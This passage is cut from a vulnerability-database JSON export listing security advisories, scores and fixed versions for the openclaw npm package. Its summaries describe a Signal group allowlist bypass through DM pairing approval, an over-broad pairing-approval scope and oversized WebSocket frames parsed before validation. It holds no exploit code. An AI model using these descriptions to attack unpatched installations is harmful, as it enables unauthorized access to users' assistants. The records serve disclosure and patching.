"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28-beta.1"}],"aliases":["CVE-2026-35657","GHSA-5jvj-hxmh-6h6j"],"risk_score":3.2,"exploitability":"0.5","weighted_severity":"6.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9uyu-y9qv-u7e1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90898?format=json","vulnerability_id":"VCID-9v6f-dbmk-jygq","summary":"Duplicate Advisory: Signal group allowlist authorization bypass via DM pairing-store leakage\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-wm8r-w8pf-2v6w. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.26 contain an authorization bypass vulnerability where Signal group allowlist policy incorrectly accepts sender identities from DM pairing-store approvals. Attackers can exploit this boundary weakness by obtaining DM pairing approval to bypass group allowlist checks and gain unauthorized group access.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/64de4b6d6ae81e269ceb4ca16f53cda99ced967a","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/64de4b6d6ae81e269ceb4ca16f53cda99ced967a"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8bdda7a651c21e98faccdbbd73081e79cffe8be0","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/8bdda7a651c21e98faccdbbd73081e79cffe8be0"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-dm-pairing-store-leakage-in-signal-group-allowlist","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-dm-pairing-store-leakage-in-signal-group-allowlist"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31991","reference_id":"CVE-2026-31991","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31991"},{"reference_url":"https://github.com/advisories/GHSA-r849-826x-wgqm","reference_id":"GHSA-r849-826x-wgqm","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r849-826x-wgqm"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wm8r-w8pf-2v6w","reference_id":"GHSA-wm8r-w8pf-2v6w","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wm8r-w8pf-2v6w"}],"fixed_packages":[],"aliases":["GHSA-r849-826x-wgqm"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9v6f-dbmk-jygq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89099?format=json","vulnerability_id":"VCID-9xgq-vtg2-jucq","summary":"## Impact\n\nOpenClaw `node.pair.approve` placed in `operator.write` scope instead of `operator.pairing` allows unprivileged pairing approval.\n\nThe pairing approval method accepted operator.write instead of the narrower pairing scope and admin requirement for exec-capable nodes.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42426","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12799","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12838","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12833","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42426"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-67mf-f936-ppxf","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-67mf-f936-ppxf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42426","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42426"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-authorization-in-node-pair-approve-via-operator-write-scope","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-authorization-in-node-pair-approve-via-operator-write-scope"},{"reference_url":"https://github.com/advisories/GHSA-67mf-f936-ppxf","reference_id":"GHSA-67mf-f936-ppxf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-67mf-f936-ppxf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42426","GHSA-67mf-f936-ppxf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9xgq-vtg2-jucq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90304?format=json","vulnerability_id":"VCID-9xrt-mv81-3yc8","summary":"OpenClaw: Voice-call still parses large WebSocket frames before start validation (Incomplete fix for CVE-2026-32062)\n## Summary\nIncomplete fix for CVE-2026-32062: voice-call still parses large WebSocket frames before start validation\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 still parses oversized pre-start voice-call WebSocket frames before start validation, and the unreleased maxPayload fix confirms the shipped resource-consumption bug remains open.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `9abcfdadf591bf266d85fbdfe14ae833e557a110` — 2026-03-31T19:47:10+09:00\n\nOpenClaw thanks @Kazamayc for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41400","reference_id":"","reference_type":"","scores":[{"value":"0.00164","scoring_system":"epss","scoring_elements":"0.37267","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00164","scoring_system":"epss","scoring_elements":"0.37242","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00164","scoring_system":"epss","scoring_elements":"0.37274","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41400"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9abcfdadf591bf266d85fbdfe14ae833e557a110","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/"}],"url":"https://github.com/openclaw/openclaw/commit/9abcfdadf591bf266d85fbdfe14ae833e557a110"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2w79-r9g8-wmcr","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2w79-r9g8-wmcr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41400","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41400"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-oversized-websocket-frames-in-voice-call","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-oversized-websocket-frames-in-voice-call"},{"reference_url":"https://github.com/advisories/GHSA-2w79-r9g8-wmcr","reference_id":"GHSA-2w79-r9g8-wmcr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2w79-r9g8-wmcr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"